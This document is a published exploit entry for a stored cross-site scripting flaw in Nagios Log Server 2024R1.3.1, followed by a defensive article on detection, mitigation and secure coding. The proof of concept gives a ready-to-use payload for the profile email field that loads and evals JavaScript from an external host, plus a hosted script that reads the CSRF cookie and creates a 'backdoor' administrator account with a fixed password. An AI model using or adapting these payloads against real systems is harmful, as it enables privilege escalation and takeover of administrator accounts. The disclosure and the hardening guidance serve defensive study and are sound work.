Nagios Log Server 2024R1.3.1 - Stored XSS

Exploit Author: Seth Kraft Analysis Author: www.bubbleslearn.ir Category: WebApps Language: JavaScript Published Date: 2025-04-03 
# Exploit Title: Stored XSS Vulnerability in Nagios Log Server (Privilege Escalation to Admin)
# Date: 2025-04-02
# Exploit Author: Seth Kraft
# Vendor Homepage: https://www.nagios.com/
# Vendor Changelog: https://www.nagios.com/changelog/#log-server
# Software Link: https://www.nagios.com/products/log-server/download/
# Version: 2024R1.3.1 and below
# Tested On: Nagios Log Server 2024R1.3.1 (default configuration, Ubuntu 20.04)
# CWE: CWE-79, CWE-352, CWE-285, CWE-269, CWE-602
# CVSS: 9.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:R/S:C/VC:H/VI:H/VA:H)
# Type: Stored Cross-Site Scripting (XSS), Privilege Escalation
# Exploit Risk: Critical

# Disclosure
For research and authorized testing only. Do not use against systems without permission.

# Description:
A stored XSS vulnerability in Nagios Log Server 2024R1.3.1 allows a low-privileged user to inject
malicious JavaScript into the 'email' field of their profile. When an administrator views the audit logs,
the script executes, resulting in privilege escalation via unauthorized admin account creation.
The vulnerability can be chained to achieve remote code execution (RCE) in certain configurations.

# PoC

1. Log in as a standard (non-admin) user.
2. Navigate to the profile update endpoint:

   http://<target-ip>/nagioslogserver/profile/update

3. Inject the following payload into the email field:

```javascript
<script>
fetch("https://<EXTERNAL-HOST>/xss.js")
  .then(response => response.text())
  .then(scriptText => eval(scriptText))
  .catch(console.error);
</script>
```

4. Host the xss.js payload on your external server with the following content:

```javascript
(function() {
  var csrfTokenMatch = document.cookie.match(/csrf_ls=([^;]+)/);
  if (!csrfTokenMatch) return;
  var csrfToken = encodeURIComponent(csrfTokenMatch[1]);

  var requestBody = "csrf_ls=" + csrfToken +
    "&name=backdoor" +
    "&email=hacker@example.com" +
    "&username=backdoor" +
    "&password=Password123!" +
    "&password2=Password123!" +
    "&auth_type=admin" +
    "&apiaccess=1" +
    "&language=en_US" +
    "&account_type=local";

  fetch("http://<target-ip>/nagioslogserver/admin/users/create", {
    method: "POST",
    headers: { "Content-Type": "application/x-www-form-urlencoded" },
    body: requestBody
  })
  .then(response => response.text())
  .then(console.log)
  .catch(console.error);
})();
```

5. Wait for an administrator to view the audit logs. The JavaScript will execute, creating a new admin account:

Username: backdoor
Password: Password123!


Nagios Log Server 2024R1.3.1 — Stored Cross‑Site Scripting (XSS) Leading to Privilege Escalation

This article explains a stored XSS vulnerability found in Nagios Log Server 2024R1.3.1 and earlier, the impacts, detection and mitigation strategies, and recommended secure coding practices to prevent similar issues. The information focuses on defensive measures, safe testing, and remediation steps for administrators and developers.

Summary of the issue

In affected Nagios Log Server releases a low‑privileged user can persist malicious script content in a profile field that is later rendered in an administrative audit view. When an administrator views that audited content within the product UI, the browser executes the injected script in the context of the admin's session. That execution can be abused to escalate privileges (for example, by creating an administrative account) or to perform other actions available to the administrator’s session.

Impact and severity

  • Severity: High — ability to escalate a low‑privileged account to admin via client‑side code execution in an admin session.
  • Risk: Account compromise, unauthorized changes, potential lateral movement and possible RCE depending on chained vulnerabilities and environment configuration.
  • Relevant CWEs: CWE‑79 (XSS), CWE‑352 (CSRF-related chaining), CWE‑285/CWE‑269 (insufficient authorization), CWE‑602 (insufficient control over a resource).
  • CVSS (example): 9.3 (high — network exploitability, low attack complexity, privileges required, high impact when successful).

Root causes

  • Unvalidated or unsanitized user input allowed into fields (e.g., profile fields) that are persisted to a datastore.
  • Admin‑facing views render stored data as HTML without appropriate output encoding or sanitization.
  • Insufficient separation of concerns between content storage and content rendering — rendered HTML is treated as trusted.
  • Weak or missing additional hardening such as strict Content Security Policy (CSP), cookie flags (HttpOnly/SameSite), and server‑side input validation.

Detection and indicators of compromise (IoCs)

  • Audit or web application logs containing HTML tags or JavaScript tokens within user profile update requests.
  • Unexplained creation or modification of administrative accounts or changes in RBAC policies.
  • Unexpected outgoing requests from the environment to external hosts shortly after an admin views logs or audit pages.
  • Browser or endpoint alerts for script execution when administrators visit audit pages (if endpoint monitoring is available).

Immediate mitigations and workarounds

  • Apply vendor patches and updates as soon as they become available from Nagios (check the vendor changelog and official advisories).
  • Restrict who can view audit logs — limit admin UI access to a small set of hardened administrator workstations and IP ranges.
  • Temporarily render audit/log content as plain text (escape HTML) or disable rendering of rich content until a vendor patch is applied.
  • Harden session cookies (HttpOnly, Secure, SameSite) and enforce strong CSRF protections on state‑changing admin endpoints.
  • Deploy or tune a Web Application Firewall (WAF) to block common XSS payload patterns and suspicious POST bodies targeting profile or audit endpoints.
  • Rotate administrative credentials and any service accounts that might have been exposed, if you suspect a compromise.

Recommended long‑term fixes and secure development practices

Preventing stored XSS requires a defense‑in‑depth approach that includes input validation, output encoding, context‑aware sanitization, and architectural controls.

  • Server‑side validation and canonicalization: Validate inputs against expected patterns (for example, require email fields to match a strict email grammar) and canonicalize before storage.
  • Output encoding: Always apply context‑appropriate encoding when rendering user data into HTML, attributes, JavaScript, or URLs.
  • Sanitization and whitelisting: Where HTML fragments must be allowed, use a vetted HTML sanitizer that enforces a strict whitelist of tags and attributes.
  • Least privilege UI design: Avoid rendering user‑provided content in high‑privilege admin pages. Show diffs, metadata, or text previews rather than raw content.
  • HTTP response hardening: Use CSP, X‑Content‑Type‑Options, Referrer‑Policy, and similar headers to reduce impact if XSS occurs.
  • Logging policy: Treat logs and audit trails as data that may contain untrusted input — escape or sanitize before display.

Safe example: validating an email server‑side (Python)

import re
from html import escape

# Strict email validation (basic example)
EMAIL_REGEX = re.compile(r'^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$')

def validate_and_store_email(raw_email):
    email = raw_email.strip()
    if not EMAIL_REGEX.match(email):
        raise ValueError("Invalid email address")
    # Store the validated email value (never store raw HTML)
    store_in_db(email)

Explanation: This code trims input and validates it against a conservative email regular expression. It prevents HTML content from being accepted into the email field. Any accepted value is a plain string conforming to the expected format; avoid storing or rendering HTML there.

Safe example: output encoding for HTML rendering (PHP)

<?php
// Suppose $user_email is read from the datastore
echo '<div class="profile-email">' . htmlspecialchars($user_email, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</div>';
?>

Explanation: htmlspecialchars() encodes special characters (&, <, >, quotes) to their HTML entities so that browser will not interpret them as markup or script. Use this pattern for any user‑supplied data rendered into HTML.

Content Security Policy example (HTTP header)

Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-'; object-src 'none'; base-uri 'self';

Explanation: A CSP can restrict where scripts can be loaded from and can prevent inline script execution unless a valid nonce is present. CSP reduces the impact of XSS by blocking external or injected scripts from running in admin browsers. Nonces must be generated per response and injected into trusted script tags.

Configuration hardening recommendations

  • Enable Secure and HttpOnly flags on session cookies and consider SameSite=strict where feasible.
  • Limit admin UI access to known IP ranges and use MFA for all administrative accounts.
  • Monitor for creation of new high‑privilege accounts and set automated alerts for such events.
  • Perform code reviews focused on output encoding and sanitization of any data that flows into admin views.

Detection rules and SIEM ideas

  • Search for POSTs to profile/update endpoints where the request body contains characters indicative of script tags (for example, "<script" or "javascript:").
  • Alert on admin sessions that originate from unexpected IPs or perform a rapid sequence of privileged actions.
  • Flag newly created admin users and require out‑of‑band approval or verification before activating them.
  • Use endpoint/browser telemetry on administrator workstations to detect unexpected external network calls triggered by browser activity.

Testing and safe proofing

Test fixes and mitigations only in controlled environments. Use synthetic, non‑malicious test data that mimics the attack vector (for example, strings with angle brackets) and verify that the UI renders them safely as escaped text. Avoid hosting or executing active exploit code against production environments.

Responsibility, patching and remediation workflow

  • Check Nagios’ official advisories and changelog for vendor patches and apply updates promptly.
  • If you suspect you were targeted, perform an incident response: collect web/app logs, search for suspicious admin actions, rotate credentials, and rebuild affected endpoints if necessary.
  • Document the mitigation steps, perform a root cause analysis, and remediate the source code to follow secure development practices outlined above.
  • Adopt a process of regular security testing (SAST/DAST, code reviews) focused on input/output handling for admin‑facing pages.

References and further reading

  • Vendor: Nagios — https://www.nagios.com/ (check product changelog/patch notes)
  • OWASP XSS Prevention Cheat Sheet — https://cheatsheetseries.owasp.org/cheatsheets/XSS_Prevention_Cheat_Sheet.html
  • OWASP Secure Coding Practices and HTTP response headers guidance

Final notes for administrators

Stored XSS in admin‑visible interfaces is particularly dangerous because it multiplies risk: one low‑privilege user can target multiple administrators by persisting payloads. The fastest effective mitigation is to apply vendor patches; until then, restrict audit‑view access, sanitize or escape rendered content, and monitor for suspicious activity. Combine code fixes with operational hardening — cookie flags, CSP, WAF rules, and strict RBAC — to reduce both the likelihood and impact of exploitation.